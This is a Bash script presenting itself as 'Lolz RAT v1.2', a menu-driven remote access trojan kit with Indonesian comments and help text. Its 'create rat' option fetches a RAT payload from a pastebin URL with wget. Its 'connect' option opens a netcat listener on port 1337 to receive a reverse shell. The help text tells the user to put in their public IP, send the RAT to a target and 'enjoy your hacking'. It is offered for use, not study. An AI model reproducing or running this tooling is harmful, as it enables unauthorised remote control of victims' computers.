#!/bin/bash
# coded By Mr.Cakil 
# gausah ganti copyright kalo mau di hargai
# Bersihkan Layar
clear

blue='\e[0;34'
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\e[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
clear
echo -e $red"============================================"
echo -e $cyan"[+]Lolz RAT v1.2[+]"
echo -e $cyan"[+]Author By ./Mr.cakil[+]"
echo -e $cyan"[+]greetz : 99syndicate - anon cyber team[+]"
echo -e $cyan"[+]visit my blog : http://99-syndicate.blogspot.com"
echo -e "$red============================================"
echo -e $red"1) create rat"
echo -e $red"2) connect rat for target"
echo -e $white"3) help"
echo -e $white"4) exit"
read -p "[mrcakil@Tools]> " cakil;

if [ $cakil = 01 ] || [ $cakil = 1 ]
then
clear
echo -e $cyan"[+]please wait....\n"
sleep 3
echo -e $cyan"[+]create your rat..\n"
sleep 2
apt-get update
apt-get install wget
apt-get install netcat
wget -O rat.sh https://pastebin.com/raw/rgLiXwE9
sleep 1
echo $red"[+]done your create"
fi
if [ $cakil = 02 ] || [ $cakil = 2 ]
then
clear
apt-get install netcat
clear
echo -e $red"[+]please wait connection mastah"
sleep 1
echo -e $white"[+]please wait connection target"
nc -l -p 1337
fi
if [ $cakil = 03 ] || [ $cakil = 3 ]
then
clear
echo "[+]TUTORIAL MENGGUNAKAN lolz RAT V1.2[+]"
echo "[+]create rat nya dulu cok"
echo "[+]edit rat.sh nya ganti 127.0.0.1 dengan ip public mu"
echo "[+]koneksi kan ke target"
echo "[+]send rat ke target"
echo "[+]enjoy your hacking"
echo "[+]contact:mrcakil@programmer.net"
fi
if [ $cakil = 04 ] || [ $cakil = 4 ]
then
echo -e $red"thanks sudah make tools saya"
sleep 1
echo -e $white"my blog : http://99-syndicate.blogspot.com"
sleep 1
echo -e $red"my facebook : http://www.facebook.com/dendisaimam.dendisaimam.1"
sleep 1
echo -e $white"contact me : mrcakil@programmer.net"
echo -e $red"bye ea :*"
fi
